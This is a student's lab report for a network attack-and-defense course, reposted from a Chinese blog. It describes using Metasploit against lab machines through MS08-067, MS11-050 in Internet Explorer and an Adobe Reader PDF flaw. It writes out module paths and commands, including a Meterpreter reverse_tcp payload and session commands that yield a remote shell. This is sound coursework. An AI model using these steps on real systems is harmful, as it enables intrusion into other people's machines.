20145334赵文豪《网络攻防》 MSF基础应用

实践目标
掌握metasploit的基本应用方式
掌握常用的三种攻击方式的思路。

实验要求
一个主动攻击,如ms08_067
一个针对浏览器的攻击,如ms11_050
一个针对客户端的攻击,如Adobe
成功应用任何一个辅助模块

实验问答
用自己的话解释什么是exploit,payload,encode.
exploit是利用系统漏洞,相当于一个动态的过程。
payload是攻击载荷,用于实现对漏洞的攻击,是实现漏洞攻击最核心的代码。
encode是用于实验特征码伪装的编码,可以实现免杀

三个靶机真的很大很大很大,拷了半天!

MS08_067远程漏洞攻击实践:Shell

在kali终端中开启msfconsole。

输入命令search ms08_067,查看这个渗透模块
885896-20170416135042509-1272493947.png

输入命令show payloads会显示出有效的攻击载荷
885896-20170416135200962-2088908700.png

并且可以查看我们可以使用的载荷
885896-20170416135237181-1381475857.png

设置kali的ip地址
设置靶机的ip地址
最后进行渗透
885896-20170416135518431-1298718973.png

885896-20170416135740040-1911603116.png

MS08_067远程漏洞攻击实践:meterpreter

前面依然使用命令use exploit/windows/smb/ms08_067_netapi,进入ms08_067漏洞模块。

设置payload:set payload windows/meterpreter/reverse_tcp

show options,查看需要设置的ip地址

885896-20170416140137212-138399568.png

ps查看进程

885896-20170416140423931-1991879335.png

meterpreter转shel

885896-20170416140817384-1505455503.png

MS11-050漏洞攻击
利用IE浏览器的渗透

确保我们的kali和xp系统能互相ping通,这个是非常重要的,xp系统作为靶机。必须关掉防火墙!!!!

885896-20170416141050087-370225552.png

进入msfconsole
885896-20170416141309024-988298406.png

show options查看需要设置的相关信息
885896-20170416141944477-726979451.png

设置SRVHOST和LHOST地址,并且监听,找到url
885896-20170416141517743-1710059388.png

在靶机IE上输入网址,并在靶机上查看信息,kali中显示一个session 1已经创建

输入命令sessions -i 1,开始连接
885896-20170416142245009-982950382.png

输入命令sessions -i 1,开始连接以后,攻击成功了,获取shell

885896-20170416142256118-330508015.png

Adobe阅读器渗透攻击

kali中启动msf,然后我们进入adobe_cooltype_sing
885896-20170416144925493-1865268013.png

配置IP地址和端口号之外,配置PDF文件,之后反向连接
885896-20170416145152993-1955295613.png

885896-20170416145230212-766812580.png

885896-20170416145239852-1197119683.png

转载于:https://www.cnblogs.com/bestizwh/p/6718787.html

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值